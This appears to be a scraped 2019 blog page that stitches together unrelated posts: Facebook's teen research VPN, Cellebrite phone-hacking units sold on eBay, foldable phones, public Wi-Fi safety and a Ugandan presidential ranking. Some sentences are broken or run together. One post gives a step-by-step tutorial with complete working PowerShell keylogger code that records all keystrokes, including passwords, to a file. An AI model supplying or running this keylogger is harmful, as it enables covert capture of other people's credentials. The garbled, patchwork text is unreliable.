Saturday, March 2, 2019

Facebook has again been lying its users!

Facebook's 2019 looks set to repeat the PR train wreck of 2018, with the company now admitting that they misrepresented the extent of their spying on teenage user data when the controversy came to light in January this year. Significantly more kids were affected than originally acknowledged and parental consent was nothing of the sort.
This comes a day after Instagram was slammed for being the worst social media culprit for facilitating child abuse.
Any relief the social media giant may have been feeling following January’s record results, and consigning 2018 to the history books, now seems to be fading away.
At the end of January, the news broke that Facebook has been secretly paying people to install a 'Facebook Research' VPN to harvest users' phone and web activity. The program deployed a VPN that bypassed the app store safeguards, granting access to private messages and chats, web activity and emails open. Last year,
Apple removed the Israeli Onavo app ,
acquired by Facebook in 2013 for up to $200 million, for "snooping" on users in violation of its rules.
Facebook withdrew the application and rode out the storm. Controversy over, right? Wrong.
The Truth Emerges
At the time, the social media giant claimed that "less than 5 percent of the people who chose to participate in this market research program were teens. All of them with signed parental consent forms."
But now, in a letter to U.S. Senator Mark Warner, dated 20 February, the company has admitted - again - that they were somewhat expedient with the truth. "Initial reporting around this project was not entirely accurate," they said. “At the time we ended the Facebook Research App on Apple’s iOS platform, less than 5 percent of the people sharing data with us through this program were teens. The analysis shows that number is about 18 percent when you look at the complete lifetime of the program and also add people who had become inactive and uninstalled the app.”
As reported by TechRadar , the letter to Senator Warner from Facebook's VP for U.S. Public Policy, Kevin Martin, also admitted that "potential participants were required to confirm that they were over 18 or provide other evidence of parental consent, though the vendors did not require a signed parental consent form for teen users."
Ironically, last week Facebook finally agreed to launch a clear history function that will please users and annoy advertisers in equal measure. It was seen as a step in the right direction. The company clearly wants to get ahead of the issues - to an extent. Its challenge is that so many of the issues are tightly integrated into its business model.
"The idea is a lot of sites need cookies to work," CEO Mark Zuckerberg wrote in a blog, "but you should still be able to flush your history whenever you want. We’re building a version of this for Facebook too. It will be a simple control to clear your browsing history on Facebook – what you’ve clicked on, websites you’ve visited, and so on."
But, CFO David Wehner acknowledged the issues this will cause their business model, creating "headwinds in terms of being able to target as effectively as before."
No dates have been given - expect significant consultation with major advertisers to be taking place.
Regulation Approaches
On 'Safer Internet Day' In February,
Margot James MP, the U.K.'s Minister for Digital said that "online safety is a top priority for the Government and we want to make the U.K. the safest place in the world to be online. We will soon be publishing an Online Harms White Paper which will set out clear expectations for companies to help keep their users, particularly children, safe online." She added that the White Paper "will set out new legislative measures to ensure that the platforms remove illegal content and prioritize the protection of users, especially children, young people and vulnerable adults."
The British MP followed this with an interview to Business Insider , saying that the threat of financial sanctions against the leading social media platforms is set to become very real if toxic content and bad behaviors are not brought under control, and comparing the proposed sanctions program to "the powers that the ICO [Information Commissioner's Office] already has." Under GDPR, this could mean fines of up to 4% of global revenues - some $2.2 billion for Facebook.
"As you know, we are not generally opposed to regulation," Facebook confirmed in their letter - that's good because it is becoming ever clearer that some form of regulation is now inevitable.
"You know it's a good day at Facebook when the words 'teenagers,' 'research,' and 'lying' are in the news," wrote Mashable.
The issues around safeguarding social media's young userbase are not specific to Facebook. Also in recent days, YouTube has had to respond to claims that its platform was being used to facilitate child exploitation. "We disabled comments from tens of millions of videos that could be subject to predatory behavior,"

When eBay merchant Mr. Balaj was looking through a pile of hi-fi junk at an auction in the U.K., he came across an odd-looking device. Easily mistaken for a child’s tablet, it had the word “Cellebrite” written on it. To Mr. Balaj, it appeared to be a worthless piece of electronic flotsam, so he left it in his garage to gather dust for eight months.
But recently he’s learned just what he had his hands on: a valuable, Israeli-made piece of technology called the Cellebrite UFED. It’s used by police around the world to break open iPhones, Androids and other modern mobiles to extract data. The U.S. federal government, from the FBI to Immigration and Customs Enforcement, has been handing millions to Cellebrite to break into Apple and Google smartphones. Mr. Balaj ( Forbes agreed not to publish his first name at his request) and others on eBay are now acquiring and trading Cellebrite systems for between $100 and $1,000 a unit. Comparable, brand-new Cellebrite tools start at $6,000.
Cellebrite isn’t happy about those secondhand sales. On Tuesday, two sources from the forensics industry passed Forbes a letter from Cellebrite warning customers about reselling its hugely popular hacking devices because they could be used to access individuals’ private data. Rather than return the UFEDs to Cellebrite so they can be properly decommissioned, it appears police or other individuals who’ve acquired the machines are flogging them and failing to properly wipe them. Cybersecurity researchers are now warning that valuable case data and powerful police hacking tools could have leaked as a result.
Cellebrite warns customers about reselling its high-tech mobile hacking devices. FORBES
Hacker’s delight
Earlier this month, Matthew Hickey, a cybersecurity researcher and cofounder of training academy Hacker House, bought a dozen UFED devices and probed them for data. He discovered that the secondhand kit contained information on what devices were searched, when they were searched and what kinds of data were removed. Mobile identifier numbers like the IMEI code were also retrievable.
Hickey believes he could have extracted more personal information, such as contact lists or chats, though he decided not to delve into such data. “I would feel a little awful if there was a picture of a crime scene or something,” he said. But using the information within a UFED, Hickey believes a malicious hacker could identify the suspects and their relevant cases.
In one screenshot provided by Hickey to Forbes, the previous UFED user had raided phones from Samsung, LG, ZTE and Motorola. Hickey had tested it on old iPhone and an iPod models with success.
Cellebrite hasn’t returned repeated emails from Forbes seeking comment over the last two weeks.
Rooting out Cellebrite’s secrets
The tools may also contain the software vulnerabilities Cellebrite keeps secret from the likes of Apple and Google, said Hickey. Cellebrite’s exploits (little software programs that break the security of computers and mobile phones) were encrypted, but the keys should be extractable from the UFED, though Hickey hasn’t had success on the tools he bought.
As Forbes reported in March last year, Cellebrite had become so adept at finding iOS flaws that it was able to crack the passcodes of the latest Apple models , up to the iPhone X. But the forensics provider is in a race to find flaws before Apple patches them and the hacks become impossible. The company explained to Forbes that it had to keep those exploits secret so Apple couldn’t fix and prevent police from accessing iPhones.
Looking deeper, Hickey found what appeared to be Wi-Fi passwords left on the UFEDs too. They could have belonged either to police agencies or to other private entities that had access to the devices, such as independent investigators or business auditors.
Reselling police data
There’s one obvious reason the Cellebrite devices have started appearing online: There are newer models of UFED being released with fresh software. But Hickey was concerned to find leftover forensics data.
“You’d think a forensics device used by law enforcement would be wiped before resale. The sheer volume of these units appearing online is indicative that some may not be renewing Cellebrite and disposing of the units elsewhere,” Hickey told
Forbes.
“Units are intended to be returned to vendor precisely for this reason, people ignoring that risk information on the units being available to third parties.”
Hackable hacking kit
Hickey said security on the units was “fairly poor.” In particular, he was able to find out the admin account passwords for the devices and take control of them. Cracking the devices’ license controls was also simple, using guides found on online Turkish forums. A skilled hacker could unleash the device to break into iPhones or other smartphones using the same information, he said. A malicious attacker could also modify a unit to falsify evidence or even reverse the forensics process and create a phone capable of hacking the Cellebrite tech, Hickey warned.
Despite concerns about the security of critical law enforcement devices, Hickey at least plans to do something fun with his purchases. For some upcoming hacker parties, he’s going to alter them to run the shoot-’em-up classic Doom. Others have already started playing.
el
some of you should start being careful of what comes out of your beaks!!!! i know that such people who post such want gain attention ....and later on start deceiving that CMI,ISO,CID,SFC operatives are hunting you because of what your dirty minds compels you to write.Let warn you,its high time you start avoiding jokes about Security!!!!! now ,what if they ask you when,how and where in kisoro you saw those army vehicles, what would you say???? By the way,some of you are not ever worth to be thought of by CMI and i think some of you have never seen real CMI or ISO,SFC....you really have not!!!!
Cellebrite UFED, an iPhone hacking tool made in Israel and widely used by the law enforcement authorities including the Federal Bureau of Investigation, Customs Enforcement and Immigration departments is surprisingly up for sale on eBay.
This tool is mainly used for hacking or breaking open modern mobile phones such as iPhones and Androids for the sole purpose of obtaining data. The law enforcement authorities primarily use Cellebrite to extract data from Google smartphones and Apple devices . It is the same iPhone hacking tool that the FBI used to break open the iPhone 5C of Syed Rizwan Farook , the infamous San Bernardino shooter.
See: Textalyzer Device Tells Police Everything Users Do on Their Smartphone
According to Forbes , second hand Cellebrite is being sold on eBay between $100 to $1000. It is worth noting that Cellebrite sells new tools for $6,000. Understandably, Cellebrite, a forensic data firm responsible for making Cellebrite UFED, isn’t happy about it and has warned customers about reselling such sensitive hacking devices because if landed into wrong hands, these can be exploited to access someone’s private information. Cellebrite also requested users to return the UFEDs to the company so that these could be decommissioned appropriately.
Thomas Brewster
@iblametom
Cellebrite has issued a warning to customers about the risk of reselling its devices.
I spoke to a guy who found one at a real-world auction and resold on eBay. He didn't know he had police iPhone/Android hacking tech, put it in his garage to gather dust for 8 months.
Lewl.
Thomas Brewster @iblametom
New - The Feds’ Favorite iPhone Hacking Tool Is Selling On eBay For $100—And It’s Leaking Data forbes.com/sites/thomasbr…
64 2:43 PM - Feb 27, 2019
45 people are talking about this
Security researcher Matthew Hickey (Hacker Fantastic on Twitter) bought several Cellebrite UFED devices and identified that there was indeed valuable data stored on the devices including IMEI numbers that can be used to locate a mobile phone easily. Moreover, Hickey believes that the devices might also reveal chat and contact lists but he didn’t attempt to dig any deeper.
Hacker Fantastic
@hackerfantastic
Cellebrite UFED classic exploits & functions - I got this gem at an auction - has SIM card cloning features (elite)
267 12:13 AM - Feb 12, 2019
99 people are talking about this
Another grave issue of concern is that the second hand Cellebrite UFEDs can also leak information about vulnerabilities that many devices like Apple iPhones contain. In March 2018, Forbes reported that Celebrite can identify iOS flaws and can crack passwords of the newest Apple models including the iPhone X and the company deliberately keeps these flaws a secret so that Apple couldn’t fix it. This way, Cellebrite helps law enforcement in retrieving data from mobile phones.
Hickey claims that the units are poorly secured as he could easily identify the admin account passwords of the units and could control them while accessing their license controls was also an easy feat to accomplish. All that he needed to do is check out for online guidelines on Turkish forums.
See: US government gets its hand on $15,000 iPhone do this, imagine what a skilled hacker could be capable of. A smart hacker can easily hack iPhones using the information or modify the unit to alter evidence or fully reverse the forensic process in order to make the device capable of hacking the technology that Cellebrite is most sought-after for.

Tuesday, February 26, 2019

Remember the days when text messages and Snake on your Nokia 3310 were two of the most exciting things a phone could manage? We do too. Fast forward 15 years and we have in-display fingerprint scanners,
punch-hole front cameras , bezel free displays and a whole new take on slider and flip phones.
Flip phones were once slim, compact and hinged devices. Now, flip phones have morphed into foldable phones and they are set to be unhinged, in both senses of the word.
With bendable screens, Android support, plenty of potential and huge price tags, here are the devices leading the crazy foldable smartphone trend, from the already announced to the upcoming and rumoured.
Huawei
6.6-inch front, 6.38-inch rear, unfolds into 8-inch OLED tablet
4500mAh battery with 55W fast-charging
Kirin 980 chipset and 5G modem
Leica triple camera
Huawei was the one to steal the show at Mobile World Congress 2019 , unveiling its take on a folding phone in the Mate X. Unlike the Samsung Fold (below), the X has its screen on the exterior fold - presented as a 6.6-inch main screen and elongated 6.38-inch screen on the rear. Unfolded, the two present as an 8-inch tablet form.
It's seamless, with no separation, no kinks or creases - and we think the Mate X is a much smarter implementation of the folding feature idea than Samsung's 'hidden tablet' in the Fold. However, the Huawei might struggle with scratches.
Elsewhere the Mate X offers top-end spec: its got a 4500mAh total battery capacity with fastest-in-class 55W charging (80 per cent in just 30 minutes), the company's top-end Kirin 980 processor and a 5G modem for the fastest possible connectivity. There's no final word on price or release date just yet, though, but Huawei being Huawei we'd expect it to be competitive against Samsung's offering.
Huawei Mate X in pictures
Samsung
7nm 64-bit octa-core processor, 12GB RAM
4.6-inch to 7.3-inch Infinity Flex display
512GB storage
4380mAh battery capacity
The Samsung Galaxy Fold is finally official, following years of rumours. The device was revealed alongside the Galaxy S10 range at Samsung Unpacked 2019 and it will go on sale at the end of April for the US and beginning of May for Europe, with a starting price of €2000.
The Galaxy F foldable smartphone has a 4.6-inch screen that folds out to an 7.3-inch tablet, but unlike the Royole FlexPai (below), it has a more consumer friendly design with a more considered hinge. It features a 7nm Exynos chip, coupled with 12GB of RAM and 512GB of storage. There is no microSD but the device does offer six camera and the software allows for three-app multi-tasking when open on the larger display.
Samsung Galaxy Fold: Everything you need to know
Royole
Qualcomm SD855, 6/8GB RAM
7.8-inch flexible screen, 308ppi
16MP/20MP cameras
134 x 190.3 x 7.6mm (unfolded), 320g
Royole beat everyone to the punch, announcing the first commercially-available smartphone with a flexible display. It's currently only available in China as a developer model but the FlexPai turns from a 7.8-inch tablet to a smartphone by folding in half.
It's got all the power of a typical flagship smartphone but it's a bulky bit of kit when folded and it doesn't fold flat, leaving a nice big air gap next to the non-existent hinge. It also starts at £1209/$1300. There's plenty of future potential though, especially given the screen technology is just millimetres thick.
Royole FlexPai in action
Xiaomi
President of Xiaomi, Lin Bin, tweeted a teaser video of a foldable phone so the trend is on the Chinese company's radar, though it wasn't ready for Mobile World Congress .
The device folds both sides, allowing for a smaller phone unit from the larger 4:3 tablet. The video shows the software adapting accordingly depending on the form factor, but Xiaomi's vice president told us the company is still studying what technologies should be offered.
Currently the device is just an engineering sample, though Bin said if it is liked by enough people, the company would consider developing a consumer version. He asked for name suggests. We are all about Foldy Mcfoldface.

TCL
TCL announced at Mobile World Congress 2019 that it will be entering the foldable smartphone market at some stage, though it doesn't yet have a specific device. Instead, the company showed off a hinge - called DragonHinge - that could feature on various foldable phone designs, as well as wearables.
There was also a prototype device at MWC, which opened and shut like a wallet. The screen was on the inside and while there was no external display, the company also showed a concept with a display on the cover, allowing users to check notifications and messages.
TCL is entering the foldable device game with versatile DragonHinge
LG
LG
Not ruled out foldable device
LG announced the V50 ThinQ at Mobile World Congress 2019 , but it isn't a foldable phone. Instead, the 6.4-inch device has a Dual Screen accessory that allows users to experience two screens together but they can be detached from each other. The Dual Screen comes in the form of a foldable case with a display and it connects to the V50 ThinQ via three pins.
The company hasn't completely ruled out making a foldable phone though. It told us in our pre-MWC briefing that a foldable phone doesn't make business sense just yet but that if things change in the future, it's something it might consider.
LG V50 ThinQ and Dual Screen accessory
OPPO
Oppo
Leaked on Weibo
Like Motorola and LG, Oppo has filed patents for a foldable smartphone. The company's product manager was reported to have said news regarding Oppo's foldable smartphone plans would potentially appear at MWC but not much else was said and nothing appeared at the show.
Instead, images of the device landed on Chinese micro-blogging site Weibo. The phone is clearly a prototype and has a OLED wraparound display on the outside rather than folding internally. Based on the images, one side of the screen has a thicker bezel for cameras and so on.
When the Oppo foldable phone will launch is not yet known but it certainly looks like the OnePlus parent company will launch one at some point.
Sony
6.2-inch, OLED, 4K
Dual rear camera (19MP + 12MP)
Qualcomm SD855
8GB RAM, 128/256/512GB storage
It's long been claimed Sony is also working on a foldable smartphone and several concept videos from Tech Configurations show just how amazing the device could be. With various names speculated, including Xperia Note Flex, it's claimed Sony's foldable device will take things to the next level and also offer a transparent display.
An in-display fingerprint reader, dual rear camera and Qualcomm's Snapdragon 855 chip are all listed specs in the concept leaks. The Sony Xperia folding smartphone is also said to have a polymer joint and a 6.2-inch OLED display with a 4K resolution when folded out.
LENOVO / MOTOROLA
Motorola
Internal and external display
Camera
Fingerprint sensor
Speculation suggests Motorola is quite literally morphing its 15-year old Razr flip phone into a foldable phone, switching the numerical keyboard for a full display that folds when you shut the phone.
It is claimed the Razr lookalike will not only offer a long internal display, but also a secondary screen on the rear, which will presumably show incoming notifications without the device needing to be open. A camera and fingerprint sensor also appear to be present, based on the leaked patent.
Apple







Apple has filed a couple of patents for foldable phones, suggesting the Cupertino company is also working on a device to meet this trend.
According to one patent , the Apple foldable smartphone may use "overlapping hinges" attached to "flexible displays".
Another patent suggests the device could roll rather than fold. Naturally, rumours are very contradictory but it has been said Apple will wait till 2020 to release a foldable smartphone so we might have a little longer to wait yet.

Apple is finally rumoured to be working on sleep tracking technology for its Apple Watch

Apple is finally rumoured to be working on sleep tracking technology for its Apple Watch , according to a Bloomberg report. The company bought Beddit, a company that makes a sleep tracking sensor strip, in May 2017, so sleep tracking has long been a feature expected to come to the Apple smartwatch.
The report suggests people familiar with the matter have said Apple is testing the sleep monitor in several "secret sites" around its Cupertino headquarters, though it is not expected to come to the Apple Watch until 2020.
Sleep tracking is currently available to the Apple Watch through third party apps, but it's not a feature supported natively. It is however, a feature that is lacking from the device, especially with most of
Apple's competition offering it. The latest Samsung Galaxy Watch Active offers four stages of sleep tracking for example, as do Fitbit's latest fitness trackers like the Charge 3.
Those devices offer multiple days of use from a single charge however, certainly in the case of the Fitbit Charge 3 anyway. For sleep tracking to be a viable feature, a longer battery life will be a necessity for the Apple Watch, or at least fast charging support.
The Apple Watch Series 5 is expected to arrive around September 2019, though by the sounds of it, we won't be seeing sleep tracking until the Apple Watch Series 6. Hopefully that timeline will improve though. When it does arrive, we'd expect sleep tracking to play a part in Apple Rings too.

Updf handsover 70 ex m23 rebels to DRC


Monday, February 25, 2019

How to use the public wifi safely

WiFi is a lot like water. It is available almost everywhere and probably should be free. Unfortunately, a lot of times it is not safe to drink free water. Water that is sourced from a stream might be dirty, and unless you have a water purification system, it is not a good idea to drink much of it. Water from the ocean might be too salty. Avoid water from a sewer at all costs.
WiFi can also be unsafe, especially if it is free and public.
The difference between Ethernet and WiFi
When people use Ethernet, safe and secure internet access is much more certain. With a wired Ethernet connection, people must physically go to the source if they want to infiltrate the network. In contrast, a wireless network system means a person merely has to be with in the reach and range of the Wi-Fi to connect. Upon connecting, you are placing your devices into a network that are likely not secure. There are many attacks you are vulnerable to when you log in.
Man in the Middle Attacks
A Man in the Middle Attack is an attack in which an attacks places himself in between point A (your device) and point B (your connection spot). The attacker intercepts the information, effectively eavesdropping. Therefore, it is not wise to log into your bank account, check emails, or view any sensitive information while connected to public WiFi.
Malicious Software and Honeypots.
Within the unprotected network, there are a plethora of opportunities for an attacker to hide Malware. Often, hackers will find vulnerabilities and code in malicious software. Other times, they will set up their own fake WiFi hot-spots. These fake hot-spots impersonate legitimate networks in hopes that someone will connect. From that point on, your device is fair game for Malware.
How can you protect yourself?
First off, one of the safety ways, as we have covered before , is get a Virtual Private Network (VPN). All VPN encrypts whatever activity and sends it out via a separate IP address. In other
to much money, at least make sure to never connect to an unprotected Wifi. Make sure the network requires you to type in a password. Additionally, try to verify that the network is secured and legitimate.


How to create a simple keylogger yourself in windows: – Keylogging is the process of recording the key presses made on a keyboard on to a log. This is often done without the awareness of the user. Keylogging is widely used as a hacking trick as well. Using keylogging, all the keypresses made on a keyboard can be efficiently recorded. This can include passwords, usernames, secret pins, confidential data etc. Keylogging can be used to detect trespassing as well. In this article, a windows framework known as Powershell is used to create a simple keylogger. It consists of a command-line shell and associated scripting language. Powershell is built on the .NET framework and is used widely for various applications.
STEP 1
  • Spread out the Start menu. Type in Windows PowerShell in the search bar. From the search results, open the applications Windows PowerShell and Windows PowerShell ISE as shown in the screenshot.
1search
STEP 2
  • Click on Windows PowerShell icon in the task bar. This will result in the popping up of Windows PowerShell command prompt.
2powerShell
STEP 3
  • Copy the code given below and paste it onto the Windows PowerShell command prompt. To copy or paste, you just need to select the code and right click, in the PowerShell command prompt.
    #requires -Version 2
    function Start-KeyLogger($Path="$env:temp\keylogger.txt") 
    {
      # Signatures for API Calls
      $signatures = @'
    [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
    public static extern short GetAsyncKeyState(int virtualKeyCode); 
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int GetKeyboardState(byte[] keystate);
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int MapVirtualKey(uint uCode, int uMapType);
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
    '@
    
      # load signatures and make members available
      $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
        
      # create output file
      $null = New-Item -Path $Path -ItemType File -Force
    
      try
      {
        Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
    
        # create endless loop. When user presses CTRL+C, finally-block
        # executes and shows the collected key presses
        while ($true) {
          Start-Sleep -Milliseconds 40
          
          # scan all ASCII codes above 8
          for ($ascii = 9; $ascii -le 254; $ascii++) {
            # get current key state
            $state = $API::GetAsyncKeyState($ascii)
    
            # is key pressed?
            if ($state -eq -32767) {
              $null = [console]::CapsLock
    
              # translate scan code to real code
              $virtualKey = $API::MapVirtualKey($ascii, 3)
    
              # get keyboard state for virtual keys
              $kbstate = New-Object Byte[] 256
              $checkkbstate = $API::GetKeyboardState($kbstate)
    
              # prepare a StringBuilder to receive input key
              $mychar = New-Object -TypeName System.Text.StringBuilder
    
              # translate virtual key
              $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
    
              if ($success) 
              {
                # add key to logger file
                [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
              }
            }
          }
        }
      }
      finally
      {
        # open logger file in Notepad
        notepad $Path
      }
    }
    
    # records all key presses until script is aborted by pressing CTRL+C
    # will then open the file with collected key codes
    Start-KeyLogger
    
STEP 4
  • Now the Windows PowerShell will look like the following screenshot.
3copyCode
STEP 5
  • Now open some application and press some keys. I have opened G-Mail as an example.

STEP 6
  • Once you are done with pressing keys, look at the bottom of the code in the Windows PowerShell command prompt. There you will see an instruction Recording key presses. Press CTRL+C to see results. Press CTRL+Cas per the instruction to see the logged keystrokes.
STEP 7
  • Pressing CTRL+C will result in the opening of a notepad file, which has the recorded keystrokes.
5notepad
STEP 8
  • Alternatively, you can open the Windows PowerShell ISE as shown in the first step and copy the code. As next, click on the Play icon to run the script. This will also give the same result.
6PowerShellISE

Museveni is the 12th most economic influencer

President Yoweri Kaguta Museveni has been ranked among the best President’s in the World, according to a New York University and World Bank experts who ranked the President 12 th in terms of influencing economic growth.
The report first released in May 2018 by the World Bank economist Steve Penning’s and New York University Economics Professor William Easterly indicates that Museveni is one of the best leaders with a significant positive impact on their countries economic growth.
The two experts define the best leaders as any leaders for whom estimated leader effect is positive and significant at the 95% level and the worst leader are those with negative and insignificant leader effects.
The findings that were entitled “Shrinking dictators: how much economic growth can we attribute to national leaders” ranked Senior General Than Shwe of Burma as number one for being the most influential leader who steered his country’s economic growth at 3.95% and shrinkage of just 0.71%. He was the head of the State of Burma between 1992 and 2011 as chairman of the State Peace and development Council (SPDC).
“Leadership requires bold initiatives and President Museveni must be credited for this. It requires stringent and well thought out policies to reverse the decline our country was in and revamp the economy. Its not surprising the Museveni has firmly put this country on a steady economic growth,” Stephen Miyingo, the Senior Presidential Advisor on Economic Affairs said of the report.
He said the report provides a third party independent opinion which confirms what the NRM government has been telling Ugandans.
Easterly and Hennings ranked 24 world leaders and President Museveni came in the 12 th position, scoring higher than many powerful leaders globally including the former Prime Minister of Singapore Lee Kuan Yew and Park Chung-hee former President of South Korea between 1963 and 1979.
Museveni’s significant contribution to Uganda’s economic growth is said to be a record 2.42% with a shrinkage of only 0.78% since he came to power in 1986.
The report also established that leaders like Yoweri Museveni and Seretse Khama of Botswana rank higher than Lee Kuan Yew of Singapore partly because they did will in relation to the lower average regional growth in Sub Saharan Africa compared to East and South Asia.
While making is assessment on Museveni contribution, the report highlighted the infrastructure development at its peak now with 5,350km total of paved roads compared to 987km of 1986.
The General quality of lives and standard of living has improved tremendously together with an increase in incomes despite the increase in the population growth.
Other sectors highlighted include the employment sector with a national employment rate reducing from 11% to 8%, access to electricity grid has increased to 22% in 2017 from 14% in 2013 and access to water has also risen from 68% to78% during the same period. Revenue collections per annum has also increased, for instance in 2005/06 the total revenue collected was Shs 2.23 trillion compared to the estimated Shs 20trillion to be collected next financial year.
The report also highlighted the robust peace and security under Museveni that has been credited for the prevailing economic growth, restoration of freedom of speech, press freedom, freedom of worship relative democracy, effective foreign policy, education and tourism.